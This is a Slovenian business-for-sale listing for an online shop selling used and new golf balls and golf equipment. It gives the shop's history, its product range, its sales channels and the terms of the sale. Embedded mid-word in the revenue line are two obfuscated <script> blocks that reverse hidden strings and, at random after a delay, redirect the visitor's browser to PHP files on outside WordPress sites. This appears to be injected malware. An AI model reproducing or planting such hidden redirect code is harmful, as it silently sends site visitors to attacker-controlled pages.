Največja spletna trgovina z rabljenimi golf žogicami in opremo za golf in golfiste

 Spletna trgovina

4.500,00€

Spletna trgovina je bila ustanovljena leta 2014. Vse do začetka leta 2017 je v spletni trgovini bila osnovna panoga prodaja jezernih golf žogic. Od leta 2017 do konca leta 2018 pa so se v prodajo dodale izgubljene golf žogice. Na začetku 2019 se je v ponudbo dodala ostala NOVA oprema za golfiste in golf igrišča (Srixon, PuttOut, Pitchfix, Rangeking, PGA,…).

Dogovori z več tujimi dobavitelji opreme za prodajo v Sloveniji in širše. Spletna trgovina je največja spletna prodajalna z golf žogicami v Sloveniji.

Prodaja poteka preko naročil spletne trgovine(90%). Prav tako se prodaja direktno različnim podjetjem in golf klubom, tudi v tujino (10%). Sodelovanje s partnerji je upeljano in enostavno.

V Golfballz.eu strankam lahko ponudite:
-Nove in rabljene golf žogice
-Tiskanje – personaliziranje golf žogic
-Oprema za vadbo zunaj
-Oprema za vadbo znotraj
-Opremo za vadišča in igrišča
-Ostala oprema

Spletna trgovina ima FB profil. Oglaševanje je urejeno preko SOC medijev in Google ADS. Vsi potrebni računi so ustvarjeni in dejavni.

  • Listing ID: 1162
  • Vključuje: Blagovna znamka, Know-how, Dogovori s kupci, Licence, Oprema in stroji, Pogodbe, Zaloge, Spletna stran, Spletne skupine
  • Vključno s podjetjem: NE - samo dejavnost
  • Brez bremen, dolgov in obveznosti: DA
  • Ustanovljeno: 2014
  • Bru<script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to prihodki: 5000-10000
  • Zaloge (MPC): 4000
Contact details

Podravska Show Phone Number *****

Contact this listing owner